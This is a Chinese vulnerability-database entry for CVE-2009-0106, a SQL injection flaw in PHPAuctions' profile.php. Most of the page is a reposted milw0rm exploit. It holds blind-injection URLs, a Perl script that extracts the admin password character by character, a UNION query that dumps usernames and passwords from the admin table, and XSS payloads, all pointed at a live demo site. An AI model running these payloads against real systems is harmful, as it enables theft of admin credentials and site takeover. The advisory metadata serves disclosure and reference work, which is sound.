PHPAuctions "profile.php" SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117194 漏洞类型 SQL注入
发布时间 2009-01-05 更新时间 2009-04-10
CVE编号 CVE-2009-0106 CNNVD-ID CNNVD-200901-095
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7672
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-095
|漏洞详情
PHPAuctions是一款基于PHP的WEB应用程序。PHPAuctions(又称PHPAuctionSystem)中的profile.php存在SQL注入漏洞。远程攻击者可以借助用户id参数,执行任意的SQL指令。
|漏洞EXP
#########################
#PHPAuctionSystem#
#########################
Author:x0r
Email:andry2000@hotmail.it
Cms:PhpAuctionSystemvnew
Cmsprice:$59.99
Demo:http://www.phpauctions.info/demo/
##########################

BugIn:\profile.php(Blind\Normal Sql Injection)

Exploit(Blind):
profile.php?user_id=29%20and%20substring(@@version,1,1)=5--

profile.php?user_id=29%20and%20substring(@@version,1,1)=4--
		profile.php?user_id=29and+1=0--
		profile.php?user_id=29and+1=1--
Perl Exploit:

#!/usr/bin/perl -w

      use strict;

      use LWP::Simple;

      my $a;

  my $host = "http://www.phpauctions.info/demo/profile.php?user_id="; #Put
the victim i've used the demo

      my @chars = (48..57, 97..102);

 
      for my $i(1..32) {

         foreach my $ord(@chars) {

       

         $a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");

       

         if($a =~ /coucou/i) {#put the username of the user_id=[id]

           syswrite(STDOUT,chr($ord));

           $i++;

           last;

          }

        }

      } 

Sql Injection: 
		
profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--		
			
		
Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode]

LiveDemo:http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=4--[False]
http://www.phpauctions.info/demo/profile.php?user_id=29and
substring(@@version,1,1)=5--[True]

LiveDemo(XSS):

http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9<script>alert(1);</script>

Live Demo Sql:

http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--


Greetz:MyGirlfriend...

# milw0rm.com [2009-01-05]
|参考资料

来源:XF
名称:phpauctions-profile-sql-injection(43264)
链接:http://xforce.iss.net/xforce/xfdb/43264
来源:BID
名称:33115
链接:http://www.securityfocus.com/bid/33115
来源:SECUNIA
名称:33331
链接:http://secunia.com/advisories/33331
来源:OSVDB
名称:51144
链接:http://osvdb.org/51144
来源:MILW0RM
名称:7672
链接:http://milw0rm.com/exploits/7672